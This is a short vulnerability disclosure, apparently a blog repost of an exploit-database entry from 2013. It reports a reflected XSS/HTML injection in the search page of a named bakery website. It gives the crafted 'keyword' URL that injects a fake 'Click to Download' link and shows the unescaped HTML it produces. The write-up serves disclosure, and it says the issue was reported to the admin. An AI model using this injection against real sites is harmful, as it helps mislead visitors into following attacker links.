# Date: 27 Nov 2013
# Author: Arif Fahmi Fisal
# Vendor http://www.secretrecipe.com.my/
# Version: -
# Category: webapps
# Tested
on: Window XP
*Cross Site Scripting:*
Non-Persistent XSS Attack
In
case of Non-Persistent attack, it requires a user to visit the
specially crafted link by the attacker. When the user visit the link,
the crafted code will get executed by the user’s browser. Let us
understand this attack better with an example.
For
example, the attacker can now try to change the “Target URL” of the
link “Click to Download”. Instead of the link going to
“xssattackexamples.com” website, he can redirect it to go
“not-real-xssattackexamples.com” by crafting the URL as shown below:
Here's the code:
</div><form id="search-form" action="http://www.secretrecipe.com.my/search.html" method="get"><input type="text" name="keyword" class="keyword" value="<a href="http://xssattackexamples.com/">click to download</a>" /><input type="submit" class="button search" value="Search" /><div style="position:absolute; display:inline-block; width:120px; margin:0px; padding:3px;" class="fb-like" data-href="http://www.secretrecipe.com.my" data-send="false" data-layout="button_count" data-width="120" data-show-faces="false" data-action="recommend" data-font="tahoma"></div></form></div></div>
Url:
http://www.secretrecipe.com.my/search.html?keyword=<a
href="http://xssattackexamples.com/">Click to Download</a>
And this preview images:
Now the victim may not know what it is,
because directly he cannot understand that the URL is crafted and their
is a more chance that he can visit the URL.
*27 Nov 2013 - Report to admin
This comment has been removed by the author.
ReplyDelete